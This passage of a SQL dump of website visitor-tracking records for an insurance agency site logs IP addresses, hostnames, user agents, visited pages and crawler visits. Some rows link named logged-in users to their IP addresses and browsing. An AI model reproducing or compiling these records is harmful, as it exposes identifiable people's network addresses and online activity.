1080','','','','abrahammermelstein','','0','0',0),(2599,'0b_38aa538be4ffbb57b1ca83f72ae4bd18','1457543543','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(2602,'0b_38aa538be4ffbb57b1ca83f72ae4bd18','1457543548','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(2603,'0b_bd2b44b75a4ce83150e1260df3943460','1457543562','52.0.3.61','ec2-52-0-3-61.compute-1.amazonaws.com','/','python-requests/2.9.1','','',0,'','','','','','python','','','','0','0',0),(2606,'0b_38aa538be4ffbb57b1ca83f72ae4bd18','1457543600','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','51',0),(2608,'0b_6ba65c2ef0369a96769bbe15b26e85e6','1457543815','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2609,'0b_fb78066ecb1a71fad0d25498212967be','1457546332','148.74.14.62','ool-944ae3e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'WinXP','Chrome 48','us','','','','','','','0','0',0),(2612,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546569','142.4.218.156','spider-5.lipperhey.com','/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2614,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546576','142.4.218.156','spider-5.lipperhey.com','/robots.txt','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2617,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546577','142.4.218.156','spider-5.lipperhey.com','/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2620,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546578','142.4.218.156','spider-5.lipperhey.com','/contact/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2623,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546579','142.4.218.156','spider-5.lipperhey.com','/about-us/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2626,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546580','142.4.218.156','spider-5.lipperhey.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2627,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546582','142.4.218.156','spider-5.lipperhey.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2629,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546583','142.4.218.156','spider-5.lipperhey.com','/case-status/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2632,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546584','142.4.218.156','spider-5.lipperhey.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2635,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546585','142.4.218.156','spider-5.lipperhey.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2638,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546587','142.4.218.156','spider-5.lipperhey.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2639,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546588','142.4.218.156','spider-5.lipperhey.com','/forms/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2641,'0b_cb3021ec4651712c28e6561aaec2e3bd','1457546592','142.4.218.156','spider-5.lipperhey.com','/insentives/','Mozilla/5.0 (compatible; Lipperhey-Kaus-Australis/5.0; +https://www.lipperhey.com/en/about/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2644,'0b_f2b4eb97497d41bce33f288ae559ff66','1457546593','142.4.218.156','spider-5.lipperhey.com','/','Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19','','',0,'Android 4','Chrome 18 Mobile','','','','Unknown Spider','','','','0','0',0),(2647,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457548486','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(2650,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457548487','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(2653,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457548490','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2654,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457548496','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2657,'0b_1e6785dee71f4ad55b1935ff392456dd','1457550219','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2660,'0b_2d9783031326fbb39c8a8ca49f3c57fd','1457550978','93.163.17.70','93-163-17-70-static.dk.customer.tdc.net','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2662,'0b_5ad2c46133e47b8d526e88453c463ff2','1457551215','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(2665,'0b_722eeb2188163ece383bcd97050085cf','1457551225','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(2668,'0b_d0ab28debbdb45b9dbb16270266331f4','1457551397','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(2669,'0b_d0ab28debbdb45b9dbb16270266331f4','1457551398','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(2671,'0b_aa49e46ab139014f3a83e1de3bed4605','1457551485','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(2672,'0b_d31c91ed02b07592ca28d96f30704d7d','1457553176','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2675,'0b_d31c91ed02b07592ca28d96f30704d7d','1457553182','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2678,'0b_8689ae58791e876ff55547c55c8eb907','1457553467','66.249.83.209,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google Favicon','','',0,'Win7','Firefox 6','us','','','','','','','0','0',0),(2681,'0b_488be4ee9a200d284d12a8206f1bd139','1457553564','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(2683,'0b_488be4ee9a200d284d12a8206f1bd139','1457553565','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(2686,'0b_d817f165c0726ddc296539c9418d24d2','1457553757','66.249.75.96','crawl-66-249-75-96.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(2687,'0b_e5dd3126a8f53954366ed360c72952c9','1457553822','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(2689,'0b_e5dd3126a8f53954366ed360c72952c9','1457553824','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(2690,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457555633','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(2693,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457555633','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(2695,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457555635','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(2696,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457555646','108.58.88.178','ool-6c3a58b2.static.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2698,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457555672','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2701,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457555686','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2702,'0b_68d11867014ba117cea1a1c4cbb0b8f1','1457556663','66.249.83.213,24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(2704,'0b_efb741a5b71e4b23a5c2396a75d3297b','1457556874','66.249.75.96','crawl-66-249-75-96.googlebot.com','/products.html','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(2707,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457557462','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2708,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457557463','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(2711,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457557466','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2713,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457557472','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2714,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457558380','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2717,'0b_962b635eddd4a1ad957a3e5c4c646bc1','1457558393','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2719,'0b_d63f7acd301ef090ba74ebb3f92d6e06','1457558549','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2722,'0b_6f347f024afb9d2145b93b3f3d08a160','1457560904','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinVista','Chrome 48','us','1280 x 720','Google','','','','','0','0',0),(2723,'0b_6f347f024afb9d2145b93b3f3d08a160','1457560905','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinVista','Chrome 48','us','1280 x 720','Google','','','','','0','0',0),(2726,'0b_6f347f024afb9d2145b93b3f3d08a160','1457560907','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','0',0),(2729,'0b_6f347f024afb9d2145b93b3f3d08a160','1457560921','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/register/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','51',0),(2732,'0b_6f347f024afb9d2145b93b3f3d08a160','1457560933','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/insentives/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/register/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','51',0),(2735,'0b_6f347f024afb9d2145b93b3f3d08a160','1457560968','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinVista','Chrome 48','us','1280 x 720','Google','','','','','0','51',0),(2738,'0b_6f347f024afb9d2145b93b3f3d08a160','1457560969','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','0',0),(2741,'0b_6f347f024afb9d2145b93b3f3d08a160','1457560985','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinVista','Chrome 48','us','1280 x 720','Google','','','','','0','51',0),(2744,'0b_6f347f024afb9d2145b93b3f3d08a160','1457560986','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','0',0),(2746,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561014','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/carriers/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','51',0),(2747,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561032','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/insentives/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/carriers/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','51',0),(2749,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561033','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/insentives/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','51',0),(2752,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561034','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','0',0),(2753,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561038','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/register/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','51',0),(2755,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561044','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','0',0),(2758,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561058','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinVista','Chrome 48','us','1280 x 720','Google','','','','','0','51',0),(2761,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561059','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','0',0),(2764,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561078','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinVista','Chrome 48','us','1280 x 720','Google','','','','','0','51',0),(2765,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561078','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','0',0),(2768,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561084','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/about-us/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','51',0),(2770,'0b_f4552740137d836a7ddbbb0a67160981','1457561148','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Linux; U; Android 4.2.2; en-; SGH-T399 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','','',0,'Android 4','Safari 4 Mobile','us','','','','','','','0','0',0),(2773,'0b_f4552740137d836a7ddbbb0a67160981','1457561149','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; U; Android 4.2.2; en-; SGH-T399 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4 Mobile','us','','','','','','','0','0',0),(2776,'0b_6f347f024afb9d2145b93b3f3d08a160','1457561334','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/about-us/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','51',0),(2777,'0b_d317dea82847f5662929df82f2051e6f','1457562248','5.9.85.4','mj4.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(2779,'0b_d317dea82847f5662929df82f2051e6f','1457562252','5.9.85.4','mj4.naefmarco.ch','/SSO/235_39.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(2780,'0b_d317dea82847f5662929df82f2051e6f','1457562253','5.9.85.4','mj4.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(2783,'0b_d317dea82847f5662929df82f2051e6f','1457562255','5.9.85.4','mj4.naefmarco.ch','/SSO/235_39.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(2786,'0b_d317dea82847f5662929df82f2051e6f','1457562258','5.9.85.4','mj4.naefmarco.ch','/SSO/235_42.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(2788,'0b_6f347f024afb9d2145b93b3f3d08a160','1457563031','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','51',0),(2789,'0b_6f347f024afb9d2145b93b3f3d08a160','1457563036','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','51',0),(2792,'0b_e99d0a3773531b3bd50eb60201abe01d','1457563378','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; 